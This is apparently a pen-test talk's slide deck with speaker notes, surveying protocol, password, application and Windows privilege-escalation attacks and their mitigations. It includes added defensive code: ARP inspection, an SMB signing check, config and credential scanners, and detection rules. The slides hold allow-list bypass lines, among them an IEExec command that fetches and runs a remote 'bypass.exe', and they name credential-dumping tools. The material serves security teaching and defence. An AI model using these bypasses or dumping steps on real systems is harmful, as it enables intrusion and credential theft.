Attack All the Layers:
What’s Working During Pen Tests
Scott Sutherland and Karl Fosaaen
Introductions
• Scott Sutherland
‒ Principal Security Consultant @ NetSPI
‒ Twitter: @_nullbind
• Karl Fosaaen
‒ Senior Security Consultant @ NetSPI
‒ Twitter: @kfosaaen
We specialize in both things and stuff!
Overview
• Why do Companies Pen Test?
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
• Conclusions
Why do companies pen test?
• Compliance requirements
• Evaluate risks associated with an acquisition or partnership
• Validate preventative controls
• Validate detective controls
• Prioritize internal security initiatives
• Proactively prevent breaches
Attacking protocols
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• PXE: Preboot Execution Environment
• DTP: Dynamic Trunking Protocol
Attacking protocols: ARP (Address Resolution Protocol)
Attacking protocols: ARP
• General
‒ MAC to IP association
‒ Layer 2
• Conditions
‒ Independent of user action
‒ Broadcast network
• Attacks
‒ MITM Monitoring
‒ MITM Injection
‒ DOS
• Common mitigating controls:
‒ Dynamic ARP Inspection
‒ Port Security
‒ Static Routes (not recommended)
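The two ARP attacks on the previous slide (MITM monitoring and injection) and the first mitigation (Dynamic ARP Inspection) come down to one check: does the IP/MAC pair in an ARP reply agree with what the switch knows to be true? The following is an added example, not code from the talk or from NetSPI; it applies that check to a constructed list of ARP replies against a constructed binding table of the kind DHCP snooping would populate, and adds a second rule for IPs the table does not cover.

```python
# Added example (not from the slides): ARP reply inspection in the spirit of
# Dynamic ARP Inspection. A trusted binding table (what DHCP snooping would
# have recorded) is checked against every ARP reply seen on the segment.
# All frames and bindings below are constructed sample data.
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str    # the IP the sender claims to own
    sender_mac: str   # the MAC it wants mapped to that IP
    target_ip: str    # the host whose cache is being updated


# Constructed binding table: IP/MAC pairs the switch actually saw DHCP hand out.
TRUSTED_BINDINGS: Dict[str, str] = {
    "10.0.0.1": "00:11:22:33:44:01",    # default gateway
    "10.0.0.10": "00:11:22:33:44:10",   # workstation
}

# Constructed capture: legitimate traffic, then one host re-mapping the
# gateway and the workstation to itself (the MITM step 1 / step 2 pattern
# from the speaker notes), then an unknown host whose MAC changes.
SAMPLE_REPLIES: List[ArpReply] = [
    ArpReply("10.0.0.1", "00:11:22:33:44:01", "10.0.0.10"),
    ArpReply("10.0.0.10", "00:11:22:33:44:10", "10.0.0.1"),
    ArpReply("10.0.0.1", "00:aa:bb:cc:dd:ee", "10.0.0.10"),   # "I am the gateway"
    ArpReply("10.0.0.10", "00:aa:bb:cc:dd:ee", "10.0.0.1"),   # "I am the client"
    ArpReply("10.0.0.50", "00:11:22:33:44:50", "10.0.0.1"),
    ArpReply("10.0.0.50", "00:11:22:33:44:51", "10.0.0.1"),   # same IP, new MAC
]


def inspect_arp(replies: List[ArpReply], bindings: Dict[str, str]) -> List[str]:
    """Return one alert string per suspicious reply.

    Rule 1 (DAI proper): a reply whose sender IP/MAC pair contradicts the
    trusted binding table is a poisoning attempt for that IP.
    Rule 2 (for IPs the table does not cover): the same IP advertised with
    two different MACs inside one capture is a cache flip worth a look.
    """
    alerts: List[str] = []
    first_seen: Dict[str, str] = {}
    for r in replies:
        mac = r.sender_mac.lower()
        expected = bindings.get(r.sender_ip)
        if expected is not None:
            if expected.lower() != mac:
                alerts.append(
                    f"binding violation: {r.sender_ip} advertised as {mac} "
                    f"to {r.target_ip}, trusted binding is {expected}"
                )
            continue
        previous = first_seen.setdefault(r.sender_ip, mac)
        if previous != mac:
            alerts.append(f"mac flip: {r.sender_ip} was {previous}, now {mac}")
    return alerts


if __name__ == "__main__":
    for line in inspect_arp(SAMPLE_REPLIES, TRUSTED_BINDINGS):
        print(line)
```

Rule 1 is the whole reason the slide says static entries are "not recommended": a binding table fed by DHCP snooping scales, a hand-maintained static ARP table does not. Rule 2 is noisier (a host that genuinely swaps NICs trips it) and is the kind of check you run over a capture, not inline.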
Attacking protocols: NBNS / LLMNR (NetBIOS Name Service / Link-Local Multicast Name Resolution)
Attacking protocols: NBNS
• General
‒ IP to hostname association
‒ Layer 5 / 7
• Constraints
‒ Dependent on user action
‒ Broadcast Network
‒ Windows Only
• Attacks
‒ MITM Monitoring
‒ MITM Injection
‒ DOS
• Common mitigating controls:
‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS
‒ Disable NBNS (recommended)
• Might cause issues with legacy apps
‒ Disable insecure authentication to help limit the impact of exposed hashes
‒ Enable packet signing to help prevent SMB Relay attacks
Attacking protocols: SMB (Server Message Block)
Attacking protocols: SMB
• General
‒ SMB is the comeback kid!
‒ Layer 7
• Constraints
‒ Dependent on user action
‒ Any routable network
‒ No connecting back to the originating host
• Attacks
‒ Command execution
‒ Shells..aaand shells
• Historically, SMB Relay has been used to:
‒ Execute arbitrary commands
‒ Obtain shells
• Lately the community has been developing tools for doing
things like:
‒ LDAP queries
‒ SQL queries
‒ Exchange services
‒ Mounting file systems
Attacking protocols: SMB
• Common mitigating controls:
‒ Enable packet signing to help prevent SMB Relay attacks
‒ Apply really old patches like if you missed out on the last decade…
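"Enable packet signing" appears as the mitigation on both the NBNS/LLMNR slide and this one, and the detail that matters is the difference between signing being *enabled* and being *required*: only a server that requires signing rejects the unsigned session a relay sets up. Whether a server requires it is stated in the SecurityMode field of its SMB2 NEGOTIATE response. The block below is an added example, not code from the talk or any NetSPI tool; it parses that field from a response, and because it has to run offline it also constructs the response bytes itself with build_negotiate_response() (in practice the bytes come from the server, and the flag values are the ones MS-SMB2 defines).

```python
# Added example (not from the slides): read the SecurityMode field of an SMB2
# NEGOTIATE response to tell whether a server merely supports signing or
# requires it. Only a server that REQUIRES signing refuses the unsigned
# sessions an SMB relay depends on. The response bytes are constructed here
# with build_negotiate_response(); in practice they come off the wire.
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# SMB2 header (64 bytes) and the fixed part of the NEGOTIATE response (64 bytes;
# its StructureSize says 65 because it counts one byte of the variable buffer).
HEADER_FMT = "<4sHHIHHIIQIIQ16s"
BODY_FMT = "<HHHH16sIIIIQQHHI"


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Construct a minimal NEGOTIATE response so the parser can be exercised offline."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(BODY_FMT, 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body


def parse_negotiate_signing(data: bytes) -> dict:
    """Return dialect and signing flags from a NEGOTIATE response, or raise."""
    if len(data) < struct.calcsize(HEADER_FMT) + struct.calcsize(BODY_FMT):
        raise ValueError("truncated SMB2 message")
    magic, hsize, _cc, _status, cmd, _cr, flags, *_rest = struct.unpack(HEADER_FMT, data[:64])
    if magic != SMB2_MAGIC or hsize != 64:
        raise ValueError("not an SMB2 header")
    if cmd != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body = struct.unpack(BODY_FMT, data[64:128])
    if body[0] != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    mode = body[1]
    return {
        "dialect": body[2],
        "signing_enabled": bool(mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def relay_exposure(info: dict) -> str:
    """Turn the parsed flags into the one-line finding a report would carry."""
    if info["signing_required"]:
        return "signing required: relayed (unsigned) sessions are rejected"
    if info["signing_enabled"]:
        return "signing enabled but not required: host still accepts unsigned sessions"
    return "signing disabled: host accepts unsigned sessions"


if __name__ == "__main__":
    for mode in (0x0003, 0x0001, 0x0000):
        print(relay_exposure(parse_negotiate_signing(build_negotiate_response(mode))))
```

Run against real responses, the useful output is the list of hosts where the answer is anything other than "signing required"; that list is the remediation list for the control on this slide.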
Attacking protocols: PXE (Preboot eXecution Environment)
Attacking protocols: PXE
• General
‒ DHCP
• Constraints
‒ Broadcast domain
• Attacks
‒ Command execution
‒ Access to file system/images
Attacking protocols: PXE
• Common mitigating controls:
‒ Isolate networks
‒ Add device validation
Attacking protocols: DTP (Dynamic Trunking Protocol)
Attacking protocols: DTP
• General
‒ 802.1Q encapsulation is in use
‒ Layer 2
• Constraints
‒ Independent of user action
‒ Trunking is set to enabled or auto on the switch port
• Attacks
‒ Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default
‒ *Full VLAN hopping
• Common mitigating controls:
‒ Use a dedicated VLAN ID for all trunking ports
‒ Disable all unused ports and place them on a non-routable VLAN
‒ Configure all user ports as access ports to prevent trunk negotiation
‒ Configure frames with two 802.1Q headers
‒ Configure strong VACLs
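Three of the controls above (dedicated native VLAN on trunks, unused ports shut and parked, user ports hard-set to access mode) can be checked from the switch configuration alone. The block below is an added example, not from the talk; it parses a constructed IOS-style running-config into per-interface blocks and reports the ports that miss one of those controls. The parking VLAN number is an assumption about the site, and the check treats any port without an explicit `switchport mode access` as still open to DTP negotiation, which is the default behaviour the "Constraints" slide describes.

```python
# Added example (not from the slides): audit an IOS-style running-config for
# the DTP controls on the mitigation slide. The config text is constructed;
# the parking VLAN number is an assumption about the site.
from typing import Dict, List, Optional

PARKING_VLAN = "999"   # assumed non-routable VLAN for unused ports

SAMPLE_CONFIG = """\
interface GigabitEthernet1/0/1
 description user port, correctly hardened
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
!
interface GigabitEthernet1/0/2
 description user port left in dynamic mode
 switchport access vlan 10
!
interface GigabitEthernet1/0/3
 description unused, shut but still on the default VLAN
 shutdown
!
interface GigabitEthernet1/0/4
 description unused, shut and parked
 switchport access vlan 999
 shutdown
!
interface GigabitEthernet1/0/23
 description uplink with default native VLAN
 switchport trunk encapsulation dot1q
 switchport mode trunk
!
interface GigabitEthernet1/0/24
 description uplink with dedicated native VLAN
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 999
 switchport mode trunk
!
"""


def parse_interfaces(config: str) -> Dict[str, List[str]]:
    """Split a running-config into {interface name: [stripped config lines]}."""
    blocks: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            blocks[current] = []
        elif line == "!":
            current = None
        elif current is not None and line:
            blocks[current].append(line)
    return blocks


def _value(lines: List[str], prefix: str, default: Optional[str] = None) -> Optional[str]:
    """Return what follows `prefix` on the first line that starts with it."""
    for line in lines:
        if line.startswith(prefix):
            return line[len(prefix):].strip()
    return default


def audit_dtp(config: str) -> Dict[str, List[str]]:
    """Map each non-compliant interface to the list of controls it misses."""
    findings: Dict[str, List[str]] = {}
    for name, lines in parse_interfaces(config).items():
        issues: List[str] = []
        mode = _value(lines, "switchport mode ")
        access_vlan = _value(lines, "switchport access vlan ")
        native_vlan = _value(lines, "switchport trunk native vlan ", "1")  # IOS default
        if "shutdown" in lines:
            if access_vlan != PARKING_VLAN:
                issues.append("unused port is shut but not parked on the non-routable VLAN")
        elif mode == "trunk":
            if native_vlan == "1":
                issues.append("trunk uses default native VLAN 1; give trunks a dedicated native VLAN")
        elif mode != "access":
            issues.append("no 'switchport mode access'; DTP can still negotiate a trunk on this port")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for port, issues in audit_dtp(SAMPLE_CONFIG).items():
        print(port, "->", "; ".join(issues))
```

The "two 802.1Q headers" and VACL items are not visible in an interface block and are left out on purpose; this is a config-review helper, not a substitute for looking at what DTP frames the switch actually emits.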
Attacking passwords
• Hashes and Cracking (Offline)
• Dictionary Attacks (Online)
• Dump in Cleartext!
Attacking Passwords
Tool               Function                  Year
-----------------  ------------------------  -----
Pass the Hash      Passing Hashes            1997
Rainbow Tables     Password Cracking         2000s
SMB Relay          Relaying Captured Hashes  2001
John the Ripper    Password Cracking         2001
NetNTLM.pl         Cracking Network Hashes   2007
PTH Toolkit        Pass all the Hashes       2008
Hashcat            CPU and GPU Cracking      2010
WCE and Mimikatz   Cleartext Windows Creds   2012
Attacking Passwords: Hashes
• What are hashes?
‒ A non-reversible way of storing passwords
‒ Operating systems and applications
‒ Lots of types
• LM/NTLM
• Network and Local
• MD5
• SHA
• descrypt
Attacking Passwords: Hashes
• How do we get hashes?
‒ Cain and Abel
‒ fgdump
‒ Metasploit
‒ Mimikatz
‒ Databases
‒ Config files
Attacking Passwords: Cracking
• Cracking Hashes
‒ Rainbow Tables
‒ John the Ripper
‒ oclHashcat
‒ CPU versus GPU
Attacking Passwords: Cracking
[Chart: Minutes for Six Character Brute Force, CPU versus GPU (y-axis 0 to 600 minutes)]
Attacking Passwords: Cracking
[Figure: GPU versus CPU]
Attacking Passwords: Passing Hashes
• Passing Hashes
‒ Metasploit
‒ psexec
‒ winexec
‒ PTH toolkit
Attacking Passwords: Dictionary
• Online Vs. Offline Attacks
• Dictionary Attacks
‒ Enumerate users
• Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc.
‒ Attack!
• Are users getting smarter?
‒ Sort of…
• “Summer2014” meets password complexity requirements
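The "Summer2014" point is easy to demonstrate: the standard complexity rule counts character classes, not predictability, so a season plus a year passes it while being one of the first guesses in any dictionary run. The block below is an added example, not from the talk; meets_windows_complexity() is the usual "8+ characters, three of four classes" rule, and is_predictable() is an added pattern check of the kind an audit script or password filter can layer on top. The word lists are constructed and deliberately tiny; a real filter would load the same lists the cracking team uses.

```python
# Added example (not from the slides): why "Summer2014" passes a complexity
# policy. meets_windows_complexity() is the "8+ characters, three of four
# character classes" rule; is_predictable() reduces a password to the word
# the user started from and looks it up. Word lists are constructed and tiny.
import re
from typing import Optional

SEASONS = {"spring", "summer", "fall", "autumn", "winter"}
MONTHS = {"january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december"}
COMMON_BASES = {"password", "welcome", "letmein", "changeme", "qwerty"}
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def meets_windows_complexity(pw: str, min_len: int = 8) -> bool:
    """Three of four character classes and a minimum length: what the policy checks."""
    classes = (
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    )
    return len(pw) >= min_len and sum(classes) >= 3


def base_word(pw: str) -> str:
    """Reduce a password to the word a human started from: lower-case it,
    drop the trailing year/number/symbol, undo leet substitutions, drop
    whatever separators remain."""
    core = re.sub(r"[^a-z]+$", "", pw.lower())
    core = core.translate(LEET)
    return re.sub(r"[^a-z]", "", core)


def is_predictable(pw: str) -> Optional[str]:
    """Return a reason string if the password is built on a guessable base, else None."""
    core = base_word(pw)
    if core in SEASONS:
        return f"season + suffix pattern ({core})"
    if core in MONTHS:
        return f"month + suffix pattern ({core})"
    if core in COMMON_BASES:
        return f"common base word ({core})"
    return None


def evaluate(pw: str) -> dict:
    return {"meets_complexity": meets_windows_complexity(pw),
            "predictable": is_predictable(pw)}


if __name__ == "__main__":
    for candidate in ("Summer2014", "P@ssw0rd1!", "tR4v3l-Bike-kettle"):
        print(candidate, evaluate(candidate))
```

All three candidates satisfy the complexity rule; only the third survives the pattern check, which is the gap between "meets policy" and "survives a dictionary attack" that the slide is pointing at.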
Attacking Passwords: Cleartext
• Common application configs
• Reversible Formats
‒ Find in files
‒ Groups.xml
‒ Unattend.xml
‒ Registry
• WCE
• Mimikatz
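Groups.xml (Group Policy Preferences) and Unattend.xml are the two "reversible formats" on this slide that a defender can find by scanning SYSVOL and image shares for a known element or attribute. The block below is an added example, not from the talk or from any NetSPI tool; it walks both document types, reports every stored credential with the account it belongs to and whether the file marks it as plain text, and deliberately decodes nothing, since the purpose is to produce the list of files to clean up. Both XML documents are constructed samples with placeholder values.

```python
# Added example (not from the slides): scan Group Policy Preferences Groups.xml
# and Unattend.xml for stored credentials so they can be removed. The scanner
# only reports where a value sits and whether it is marked plain text; it does
# not decode anything. Both XML documents are constructed samples.
import xml.etree.ElementTree as ET
from typing import Dict, List

GROUPS_XML = """\
<Groups clsid="{CONSTRUCTED-GROUPS-CLSID}">
  <User clsid="{CONSTRUCTED-USER-CLSID}" name="Administrator (built-in)" changed="2014-05-01 10:00:00">
    <Properties action="U" userName="Administrator (built-in)" cpassword="CONSTRUCTED-CPASSWORD-PLACEHOLDER" changeLogon="0" neverExpires="1"/>
  </User>
  <User clsid="{CONSTRUCTED-USER-CLSID}" name="svc_backup" changed="2014-05-01 10:00:00">
    <Properties action="U" userName="svc_backup" cpassword="" neverExpires="1"/>
  </User>
</Groups>
"""

UNATTEND_XML = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>CONSTRUCTED-PLAINTEXT-PLACEHOLDER</Value>
          <PlainText>true</PlainText>
        </Password>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>CONSTRUCTED-BASE64-PLACEHOLDER</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace so element names compare by local name."""
    return tag.rsplit("}", 1)[-1]


def scan_credential_xml(text: str, source: str) -> List[Dict[str, object]]:
    """Report every stored credential in a Groups.xml or Unattend.xml document."""
    root = ET.fromstring(text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings: List[Dict[str, object]] = []
    for el in root.iter():
        name = _local(el.tag)
        # GPP: a non-empty cpassword attribute (an empty one means no password set)
        if el.attrib.get("cpassword"):
            findings.append({"source": source, "kind": "GPP cpassword",
                             "account": el.attrib.get("userName", "?"), "plaintext": False})
        # Unattend: <Password> / <AdministratorPassword> with a non-empty <Value>
        if name in ("Password", "AdministratorPassword"):
            children = {_local(c.tag): c for c in el}
            value = children.get("Value")
            if value is None or not (value.text or "").strip():
                continue
            plain_el = children.get("PlainText")
            plain = plain_el is not None and (plain_el.text or "").strip().lower() == "true"
            parent = parents.get(el)
            user_el = None
            if parent is not None:
                user_el = next((c for c in parent if _local(c.tag) == "Username"), None)
            account = (user_el.text or "").strip() if user_el is not None else name
            findings.append({"source": source, "kind": f"Unattend {name}",
                             "account": account, "plaintext": plain})
    return findings


if __name__ == "__main__":
    for doc, src in ((GROUPS_XML, "Groups.xml"), (UNATTEND_XML, "Unattend.xml")):
        for f in scan_credential_xml(doc, src):
            print(f)
```

The "plaintext" flag only records what the file claims; a cpassword value is always encoded, and an Unattend value marked `PlainText=false` is base64, so every finding is treated as a credential to rotate regardless of the flag.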
Attacking Applications: Common
• Default and weak passwords
• SQL injection
• RFI/web shells
• Web directory traversals
• UNC path injection + SMB relay
• Critical missing patches
Attacking Applications: Breakouts
• Obtain a common dialog box
• Bypass folder path and file type restrictions
• Bypass file execution restrictions
• Bypass file black/white lists
• Access native consoles and management tools
• Download and use third-party applications
Bypassing EPP: Anti-virus
• PowerShell code Injection
• Execute off network share
• Clone resource tables
• Modify import tables
• Pack files
Bypassing EPP: App White List
• Execution via approved apps
‒ PowerShell code injection
‒ Rundll32 mydll,DLLMain@12
‒ IEExec http://x.x.x.x:8080/bypass.exe
• Exceptions
‒ File name
‒ Publisher
‒ Directory
• Excessive privileges
‒ Services and policy
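Each "execution via approved apps" item above leaves a distinctive process-creation event, which is what makes them detectable even when the allow-list lets them run. The block below is an added example, not from the talk; it runs three rules over constructed process-creation events written as JSON lines with Sysmon-style field names (Image, CommandLine, ParentImage): rundll32 loading a DLL from outside the system directories, IEExec given a URL, and PowerShell launched with an encoded command or in-memory loading keywords. The event contents, paths and the 192.0.2.10 address are constructed.

```python
# Added example (not from the slides): detection logic for the "execution via
# approved apps" bypasses, run over constructed process-creation events
# (JSON lines with the Sysmon-style field names Image, CommandLine, ParentImage).
import json
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed events. Backslashes are doubled because this is JSON text.
SAMPLE_EVENTS = r"""
{"id": 1, "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL", "ParentImage": "C:\\Windows\\explorer.exe"}
{"id": 2, "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32 C:\\Users\\Public\\mydll.dll,DLLMain@12", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 3, "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\IEExec.exe", "CommandLine": "IEExec http://192.0.2.10:8080/app.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 4, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1", "ParentImage": "C:\\Windows\\System32\\taskeng.exe"}
{"id": 5, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden -enc QUJD", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
"""

SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _image_is(ev: Dict[str, object], exe: str) -> bool:
    return str(ev["Image"]).lower().endswith("\\" + exe)


def rule_rundll32_foreign_dll(ev: Dict[str, object]) -> Optional[str]:
    """rundll32 whose first argument (the DLL) lives outside the system directories."""
    if not _image_is(ev, "rundll32.exe"):
        return None
    m = re.match(r'\s*"?rundll32(?:\.exe)?"?\s+"?([^,"]+)', str(ev["CommandLine"]), re.I)
    if not m:
        return None
    dll = m.group(1).strip().lower()
    if dll.startswith(SYSTEM_DLL_DIRS):
        return None
    return f"rundll32 loading a DLL outside the system directories: {dll}"


def rule_ieexec_url(ev: Dict[str, object]) -> Optional[str]:
    """IEExec handed a URL: it will fetch and run a remote .NET binary."""
    if not _image_is(ev, "ieexec.exe"):
        return None
    m = re.search(r"https?://\S+", str(ev["CommandLine"]), re.I)
    return f"IEExec launching a remote binary: {m.group(0)}" if m else None


def rule_powershell_injection(ev: Dict[str, object]) -> Optional[str]:
    """PowerShell with an encoded command or in-memory loading keywords."""
    if not _image_is(ev, "powershell.exe"):
        return None
    cl = str(ev["CommandLine"])
    if re.search(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\b", cl, re.I):
        return "powershell with an encoded command"
    if re.search(r"virtualalloc|\[reflection\.assembly\]", cl, re.I):
        return "powershell with in-memory code loading keywords"
    return None


RULES: Tuple[Callable[[Dict[str, object]], Optional[str]], ...] = (
    rule_rundll32_foreign_dll, rule_ieexec_url, rule_powershell_injection,
)


def detect(events_jsonl: str) -> List[Tuple[int, str]]:
    """Return (event id, message) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for line in events_jsonl.strip().splitlines():
        ev = json.loads(line)
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((int(ev["id"]), msg))
    return hits


if __name__ == "__main__":
    for event_id, msg in detect(SAMPLE_EVENTS):
        print(event_id, msg)
```

Events 1 and 4 are the benign look-alikes (a Control Panel applet via rundll32, a scheduled script run with `-ExecutionPolicy Bypass`) and are there to show that the rules key on the argument that carries the bypass, not on the approved binary's name.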
Windows Escalation: Overview
• Privilege Escalation Goals
• Local Privilege Escalation
• Domain Privilege Escalation
Windows Escalation: Goals
• Local Escalation Goals
‒ Find clear text or reversible credentials with local administrative privileges
‒ Get an application to run commands as Administrator or LocalSystem
• Domain Escalation Goals
‒ Find Domain Admins
‒ Impersonate Domain Admins
Windows Escalation: Local
• Local Escalation
‒ *Clear text credentials in files, registry, over network
‒ Insecure service paths
‒ DLL preloading
‒ DLL and exe replacement
‒ Binary planting in auto-run locations (registry and file system)
‒ Modifying scheduled tasks
‒ *Local and remote exploits
‒ Leverage local applications like IIS, SQL Server, etc.
‒ *UNC path injection + SMB Relay / Capture + crack
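"Insecure service paths" is the one item on this slide that an audit script can settle from configuration alone: an unquoted ImagePath with spaces makes the service control manager try each space-delimited prefix as an executable before the real one, so the directories holding those prefixes need their ACLs checked and the path needs quoting. The block below is an added example, not from the talk; it lists those prefixes for each service in a constructed set of ImagePath values (in practice the values come from the services registry key or `sc qc`).

```python
# Added example (not from the slides): find "insecure service paths" in a set
# of service ImagePath values. An unquoted path with spaces makes Windows try
# each space-delimited prefix as an executable before the real one; the
# function lists those prefixes so their parent directories can be ACL-checked
# and the path quoted. Service entries are constructed.
from typing import Dict, List

SAMPLE_SERVICES: Dict[str, str] = {
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "wuauserv": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "VendorUpdate": r"C:\Program Files\Vendor Tools\Update Service\vupdate.exe -service",
    "BackupAgent": r'"C:\Program Files\Backup Agent\agent.exe" --daemon',
}


def unquoted_search_candidates(image_path: str) -> List[str]:
    """Return the executables Windows would look for before the real one.

    For  C:\\Program Files\\Vendor Tools\\Update Service\\vupdate.exe -service
    that is  C:\\Program.exe, C:\\Program Files\\Vendor.exe and
    C:\\Program Files\\Vendor Tools\\Update.exe. Quoted paths and paths
    without spaces yield an empty list.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []                                  # quoted: no ambiguity
    low = path.lower()
    end = low.find(".exe")
    # Everything up to and including ".exe" is the executable; the rest is arguments.
    exe = path[: end + 4] if end != -1 else path.split(" ", 1)[0]
    if " " not in exe:
        return []                                  # no space in the executable path
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service_paths(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service with an unquoted, space-containing path to its candidate list."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        candidates = unquoted_search_candidates(image_path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, candidates in audit_service_paths(SAMPLE_SERVICES).items():
        print(name)
        for c in candidates:
            print("   would be tried first:", c)
```

The finding only becomes a privilege escalation when one of the listed parent directories is writable by a low-privileged user and the service runs as LocalSystem, so the candidate list is the input to an ACL check, not the conclusion.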
Windows Escalation: Domain
• Domain Escalation – Find DAs
‒ Check locally! (Processes, Tokens, Cachedump)
‒ Review active sessions – netsess (veil)
‒ Review remote processes – tasklist
‒ Service Principal Names (SPN) – get-spn
‒ Scanning remote systems for NetBIOS information – nbtscan
‒ Pass the hash to other systems
‒ PowerShell shell spraying
‒ WINRM/WINRS shell spraying
‒ Psexec shell spraying
Windows Escalation: Domain
• Domain Escalation – Impersonate DAs
‒ Dump passwords from memory with Mimikatz
‒ Migrate into the Domain Admin’s process
‒ Steal Domain Admins delegation tokens with Incognito
‒ Dump cached domain admin hashes with cachedump
‒ Relatively new techniques
• PTH using Kerberos ticket
Conclusions
• Most Networks
‒ Kind of broken
• Most Protocols
‒ Kind of broken
• Most Applications
‒ Kind of broken
All can kind of be fixed
Attack all the layers!
• Any questions?
Attack all the layers!
• Scott Sutherland
‒ Principal Security Consultant
‒ Twitter: @_nullbind
• Karl Fosaaen
‒ Senior Security Consultant
‒ Twitter: @kfosaaen

Editor's notes

  1. Validation controls = IDS/IPS/WAF, incident response
  2. These are protocols that are commonly targeted. However, there are many others:
     ‒ Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds
     ‒ NetBIOS Name Service (NBNS): Metasploit and Responder
     ‒ Link-Local Multicast Name Resolution (LLMNR): Metasploit and Responder
     ‒ Preboot Execution Environment (PXE): Metasploit
     ‒ Dynamic Trunking Protocol (DTP): Yersinia
     ‒ Spanning Tree Protocol (STP): Yersinia, ettercap (lamia plugin)
     ‒ Hot Standby Router Protocol (HSRP): Yersinia
     ‒ Dynamic Host Configuration Protocol (DHCP): Interceptor, Metasploit, manual setup
     ‒ Domain Name Services (DNS): Metasploit, ettercap, dsniff, zodiac, ADMIdPack
     ‒ VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig
  3. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  6. Go with what you like. 
  8. Windows protocol – kind of like a backup to DNS
  - Hosts file
  - DNS
  - NBNS
  Race condition
  Limited to broadcast network
  9. Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  11. In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow SMB attacks to be successful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.
  I guess the good news is that SMB relay attacks can be prevented by enabling and requiring SMB message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.
  2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.
  Anyway, let’s get back on track…
